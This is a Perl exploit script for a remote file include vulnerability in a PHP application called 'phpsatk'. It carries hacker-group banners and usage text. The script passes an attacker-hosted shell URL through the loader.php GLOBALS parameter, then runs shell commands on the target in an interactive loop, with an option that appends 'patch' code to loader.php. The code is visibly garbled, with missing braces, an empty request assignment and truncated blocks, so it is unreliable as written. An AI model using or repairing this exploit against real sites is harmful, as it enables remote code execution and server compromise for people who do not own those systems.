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phpsatk => Remote File Include Vulnerability EXploit

# phpsatk =>  Remote File Include Vulnerability
# Script.............. :phpsatk
# Discovered By.... : Root3r_H3ll       
# Location .......... : Iran
# Class..............  : Remote
# Original Advisory : http://Www.PersainFox.com
# We ArE : Root3r_H3LL & Arash.Rj
# <Spical TNX Irania Hackers :
#  ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers
#   Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Xmors )

use LWP::UserAgent;
use LWP::Simple;

$target = @ARGV[0];
$shellsite = @ARGV[1];
$shellcmd = @ARGV[2];
$file = "/loader.php?GLOBALS=";

if(!$target || !$shellsite)


print "Type 'exit' to quit";
print "[cmd]\$";
$cmd = <STDIN>;

while ($cmd !~ "exit")
    $xpl = LWP::UserAgent->new() or die;
        $req =
or die("\n\n Failed to connect.");
        $res = $xpl->request($req);
        $r = $res->content;
        $r =~ tr/[\n]/[&#234;]/;

    if (@ARGV[4] eq "-r")
        print $r;
    elsif (@ARGV[5] eq "-p")
    # if not working change cmd variable to null and apply patch manually.
    $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) 
die(); >> loader.php";
    print q
!!                                Patch Applied                              !!
!! Code added to loader.php:                                                 !!
!! if(basename(__FILE__) == basename($_SERVER['PHP_SELF']))                  !!
!!    die();                                                                 !!
!!                                                                           !!
!! NOTE: Adding patch function has not been tested. If does not complie or   !!
!! there is an error, simply make cmd = null and add the patch code to       !!
!! loader.php                                                                !!
!!                                                                           !!
    print "[cmd]\$";
    $cmd = <STDIN>;

sub header()
    print q
..                                                            ..
..           phpsatk<=  Remote File Include  Exploit          ..
..                                                            ..
..                                                            ..
..              PerSiaNFox NetWork Security TeaM              ..
..              Discovered By : Root3r_H3ll                   ..
..                                                            ..
..                                                            ..
..                    Www.PerSiaNFox.coM                      ..
..                                                            ..

                   </\/\\/_ 10\/3 15 1|)\4/\/     

sub usage()
    print q
perl Root3r.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p> 
<Target Website> - Path to target eg: www.SiteName.com                 
<Shell Location> - Path to shell eg: www.Sh3llserver.com/sh3ll.txt 
<CMD Variable> - Shell command variable name eg: cmd                 
<r> - Show output from shell                                        
<p> - Patch loader.php                                                

perl Root3r.pl http://SiteName http://Sh3llserver/sh3ll.txt cmd -r -p   
